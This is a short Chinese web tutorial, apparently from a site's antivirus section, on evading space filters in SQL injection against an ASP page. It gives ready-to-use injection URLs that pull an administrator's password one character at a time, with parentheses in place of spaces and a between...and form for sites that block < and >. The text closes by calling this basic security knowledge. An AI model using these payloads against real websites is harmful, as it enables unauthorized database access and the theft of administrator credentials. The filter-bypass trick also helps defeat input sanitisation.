明辉站/杀毒教程/内容

使用“()”绕过空格继续注射

杀毒教程2023-05-21 阅读
[摘要]举个例 子说一下, 我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=', 如果替换其中的1=1为查询管理员的密码的语句: (select asc(mid(pass,1,1)) from [name] where id=1)&g...

举个例 子说一下, 我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=', 如果替换其中的1=1为查询管理员的密码的语句:

(select asc(mid(pass,1,1)) from [name] where id=1)>49

如何用空格呢?其实可以写成这样的:

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='

如果屏蔽了<和>符号, 则用between…and…, 语句是:

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

对于中间应该出现空格的地方, 用()进行替换, 不过, 对于很复杂的SQL语句就不太好用了。 上面说到的是字符型的, 如果是数值型, 可以在id=1后加一个括号, 不过这个我没有测试,

比如:jmdcw.asp?id=(1)and(select.....), 应该是可行的吧?

实例演示:

利用“()”绕过空格继续注射


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

……

相关阅读